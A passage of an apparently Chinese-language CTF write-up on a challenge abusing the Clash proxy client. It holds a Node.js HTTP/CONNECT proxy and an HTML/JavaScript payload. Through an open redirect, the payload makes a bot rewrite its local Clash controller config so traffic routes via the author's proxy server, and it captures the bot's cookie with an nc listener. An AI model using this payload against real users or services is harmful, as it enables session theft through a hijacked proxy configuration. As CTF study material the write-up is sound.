IP-CIDR,<span class="number">127.0</span><span class="number">.0</span><span class="number">.0</span>/<span class="number">8</span>,jrxnm</span><br><span class="line"> - MATCH,jrxnm</span><br></pre></td></tr></table></figure>

<p>其中<code>159.75.23.54:20002</code>是自己的代理服务器</p>
<h2 id="http代理"><a href="#http代理" class="headerlink" title="http代理"></a>http代理</h2><p><code>HTTP</code> 代理存在两种形式</p>
<ul>
<li>第一种是 <code>RFC 7230 - HTTP/1.1: Message Syntax and Routing</code></li>
</ul>
<p>这种代理扮演的是「中间人」角色，对于连接到它的客户端来说，它是服务端；对于要连接的服务端来说，它是客户端，它就负责在两端之间来回传送 <code>HTTP</code> 报文</p>
<p>然后什么是正向代理和反向代理呢</p>
<p>正向代理：我们国内访问谷歌，直接访问访问不到，我们可以通过一个正向代理服务器，请求发到代理服，代理服务器能够访问谷歌，这样由代理去谷歌取到返回数据，再返回给我们，这样我们就能访问谷歌了</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210906211610556.png" alt="image-20210906211610556"></p>
<p>反向代理：指以代理服务器来接受<code>internet</code>上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给<code>internet</code>上请求连接的客户端</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210906211623115.png" alt="image-20210906211623115"></p>
<ul>
<li>第二种是 <code>Tunneling TCP based protocols through Web proxy servers</code>（通过 Web 代理服务器用隧道方式传输基于 TCP 的协议）</li>
</ul>
<p><code>HTTP</code> 客户端通过 <code>CONNECT</code> 方法请求隧道代理创建一条到达任意目的服务器和端口的 <code>TCP</code> 连接，并对客户端和服务器之间的后继数据进行盲转发</p>
<p>最后，将两种代理的实现代码合二为一，就可以得到全功能的 <code>Proxy</code> 程序</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">&#x27;http&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> net = <span class="built_in">require</span>(<span class="string">&#x27;net&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">&#x27;url&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">request</span>(<span class="params">cReq, cRes</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> u = url.parse(cReq.url);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">var</span> options = &#123;</span><br><span class="line">        hostname : u.hostname, </span><br><span class="line">        port     : u.port || <span class="number">80</span>,</span><br><span class="line">        path     : u.path,       </span><br><span class="line">        method     : cReq.method,</span><br><span class="line">        headers     : cReq.headers</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">var</span> pReq = http.request(options, <span class="function"><span class="keyword">function</span>(<span class="params">pRes</span>) </span>&#123;</span><br><span class="line">        cRes.writeHead(pRes.statusCode, pRes.headers);</span><br><span class="line">        pRes.pipe(cRes);</span><br><span class="line">    &#125;).on(<span class="string">&#x27;error&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">e</span>) </span>&#123;</span><br><span class="line">        cRes.end();</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    cReq.pipe(pReq);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">connect</span>(<span class="params">cReq, cSock</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> u = url.parse(<span class="string">&#x27;http://&#x27;</span> + cReq.url);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">var</span> pSock = net.connect(u.port, u.hostname, <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        cSock.write(<span class="string">&#x27;HTTP/1.1 200 Connection Established\r\n\r\n&#x27;</span>);</span><br><span class="line">        pSock.pipe(cSock);</span><br><span class="line">    &#125;).on(<span class="string">&#x27;error&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">e</span>) </span>&#123;</span><br><span class="line">        cSock.end();</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    cSock.pipe(pSock);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">http.createServer()</span><br><span class="line">    .on(<span class="string">&#x27;request&#x27;</span>, request)</span><br><span class="line">    .on(<span class="string">&#x27;connect&#x27;</span>, connect)</span><br><span class="line">    .listen(<span class="number">8888</span>, <span class="string">&#x27;0.0.0.0&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>这里就是用来接收<code>cookie</code>的代理，这里需要往服务器<code>hosts</code>添加</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 blog.tomswebsite.com</span><br></pre></td></tr></table></figure>

<p>然后在本地<code>8888</code>端口进行<code>nc</code>的监听</p>
<h2 id="任意跳转"><a href="#任意跳转" class="headerlink" title="任意跳转"></a>任意跳转</h2><p>在<code>/logut?next=xxxx</code>是存在任意<code>url</code>跳转的，我们可以将 <code>/logout?next=</code> 设置成自己<code>vps</code>，提交反馈，让<code>bot</code>来访问我们的<code>vps</code>，当他来访问时，就触发了<code>js</code>代码的执行，让<code>bot</code>去请求<code>restful</code>接口，设置代理为我们<code>vps</code></p>
<p><code>payload</code>如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">    <span class="function"><span class="keyword">function</span> <span class="title">sleep</span> (<span class="params">time</span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">        <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="function">(<span class="params">resolve</span>) =&gt;</span> <span class="built_in">setTimeout</span>(resolve, time));</span></span><br><span class="line">    &#125;</span><br><span class="line"><span class="javascript">    <span class="function"><span class="keyword">function</span> <span class="title">setConfig</span>(<span class="params"></span>)</span>&#123;</span></span><br><span class="line"><span class="javascript">        config = <span class="string">&#x27;&#123;&quot;payload&quot;:&quot;mixed-port: 1080\\nallow-lan: true\\nmode: Rule\\nlog-level: debug\\nexternal-controller: \&#x27;127.0.0.1:9090\&#x27;\\n\\nproxies:\\n  - name: \&#x27;http\&#x27;\\n    type: http\\n    server: 159.75.23.54\\n    port: 20002\\n\\nproxy-groups:\\n  - name: \&#x27;jrxnm\&#x27;\\n    type: select\\n    proxies:\\n      - http\\n\\nrules:\\n - IP-CIDR,127.0.0.0/8,jrxnm\\n - MATCH,jrxnm\\n&quot;&#125;&#x27;</span>;</span></span><br><span class="line"><span class="javascript">        <span class="built_in">console</span>.log(config);</span></span><br><span class="line"></span><br><span class="line"><span class="javascript">        fetch(<span class="string">&quot;http://127.0.0.1:9090/configs&quot;</span>, &#123;</span></span><br><span class="line"><span class="javascript">            method: <span class="string">&#x27;PUT&#x27;</span>, </span></span><br><span class="line"><span class="javascript">            headers: <span class="keyword">new</span> Headers(&#123;</span></span><br><span class="line"><span class="javascript">            <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span></span></span><br><span class="line">        &#125;),</span><br><span class="line">            body: config, </span><br><span class="line"><span class="javascript">        &#125;).then(<span class="function"><span class="keyword">function</span>(<span class="params">response</span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">            <span class="keyword">return</span> response.text();</span></span><br><span class="line"><span class="javascript">        &#125;).then(<span class="function"><span class="keyword">function</span>(<span class="params">data</span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">        &#125;).catch(<span class="function"><span class="keyword">function</span>(<span class="params">e</span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">            <span class="built_in">console</span>.log(<span class="string">&quot;error&quot;</span>);</span></span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="javascript">    (<span class="keyword">async</span> <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span></span><br><span class="line">        setConfig();</span><br><span class="line"><span class="javascript">        <span class="keyword">await</span> sleep(<span class="number">300</span>);</span></span><br><span class="line"><span class="javascript">        location.href = <span class="string">&quot;http://blog.tomswebsite.com:8888&quot;</span>;</span></span><br><span class="line">    &#125;)();</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后拿接收到的<code>cookie</code>解密之后登录即可获取<code>flag</code></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/12/17/xmctf/" rel="prev" title="xmctf 2020">
      <i class="fa fa-chevron-left"></i> xmctf 2020
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/09/17/2021%20%E7%AC%AC%E4%BA%94%E7%A9%BA%E9%97%B4/" rel="next" title="第五空间 2021">
      第五空间 2021 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ez-piwigo"><span class="nav-number">1.</span> <span class="nav-text">ez piwigo</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Number"><span class="nav-number">2.</span> <span class="nav-text">Number</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%98%E6%96%B9%E8%A7%A3%E6%B3%95"><span class="nav-number">2.1.</span> <span class="nav-text">官方解法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Nu1L%E6%88%98%E9%98%9F%E8%A7%A3%E6%B3%95"><span class="nav-number">2.2.</span> <span class="nav-text">Nu1L战队解法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#granddad%E2%80%99s-guestbook"><span class="nav-number">3.</span> <span class="nav-text">granddad’s guestbook</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#scientific-adfree-networking"><span class="nav-number">4.</span> <span class="nav-text">scientific_adfree_networking</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#clash%E4%BB%A3%E7%90%86"><span class="nav-number">4.1.</span> <span class="nav-text">clash代理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#http%E4%BB%A3%E7%90%86"><span class="nav-number">4.2.</span> <span class="nav-text">http代理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E8%B7%B3%E8%BD%AC"><span class="nav-number">4.3.</span> <span class="nav-text">任意跳转</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="kawhi"
      src="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
  <p class="site-author-name" itemprop="name">kawhi</p>
  <div class="site-description" itemprop="description">随笔、分享、记录生活</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://47.98.234.232:8000/" title="http:&#x2F;&#x2F;47.98.234.232:8000&#x2F;" rel="noopener" target="_blank">G2mtu备用靶场</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://kawhi.gearhostpreview.com/" title="http:&#x2F;&#x2F;kawhi.gearhostpreview.com&#x2F;" rel="noopener" target="_blank">OneDrive网盘</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">kawhi</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">128k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:56</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
